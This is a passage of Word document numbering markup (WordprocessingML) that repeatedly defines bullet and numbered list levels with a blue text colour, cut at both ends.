    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21309">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21310">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21311">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21312">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21313">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21314">
    <w:lvl>
      <w:start w:val="89"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21315">
    <w:lvl>
      <w:start w:val="90"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21316">
    <w:lvl>
      <w:start w:val="91"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21317">
    <w:lvl>
      <w:start w:val="92"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21318">
    <w:lvl>
      <w:start w:val="93"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21319">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21320">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21321">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21322">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21323">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21324">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21325">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21326">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21327">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21328">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21329">
    <w:lvl>
      <w:start w:val="94"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21330">
    <w:lvl>
      <w:start w:val="95"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21331">
    <w:lvl>
      <w:start w:val="96"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21332">
    <w:lvl>
      <w:start w:val="97"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21333">
    <w:lvl>
      <w:start w:val="98"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21334">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21335">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21336">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21337">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21338">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21339">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21340">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21341">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21342">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21343">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21344">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21345">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21346">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21347">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21348">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21349">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21350">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21351">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21352">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21353">
    <w:lvl>
      <w:start w:val="99"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21354">
    <w:lvl>
      <w:start w:val="100"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21355">
    <w:lvl>
      <w:start w:val="101"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21356">
    <w:lvl>
      <w:start w:val="102"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21357">
    <w:lvl>
      <w:start w:val="103"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21358">
    <w:lvl>
      <w:start w:val="104"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21359">
    <w:lvl>
      <w:start w:val="105"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21360">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21361">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21362">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21363">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21364">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21365">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21366">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21367">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21368">
    <w:lvl>
      <w:start w:val="106"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21369">
    <w:lvl>
      <w:start w:val="107"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21370">
    <w:lvl>
      <w:start w:val="108"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21371">
    <w:lvl>
      <w:start w:val="109"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21372">
    <w:lvl>
      <w:start w:val="110"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21373">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21374">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21375">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21376">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21377">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21378">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21379">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21380">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21381">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21382">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21383">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21384">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21385">
    <w:lvl>
      <w:start w:val="111"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21386">
    <w:lvl>
      <w:start w:val="112"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21387">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21388">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21389">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21390">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21391">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21392">
    <w:lvl>
      <w:start w:val="113"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21393">
    <w:lvl>
      <w:start w:val="114"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21394">
    <w:lvl>
      <w:start w:val="115"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21395">
    <w:lvl>
      <w:start w:val="116"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21396">
    <w:lvl>
      <w:start w:val="117"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21397">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21398">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21399">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21400">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21401">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21402">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21403">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21404">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21405">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21406">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21407">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21408">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21409">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21410">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21411">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21412">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21413">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21414">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
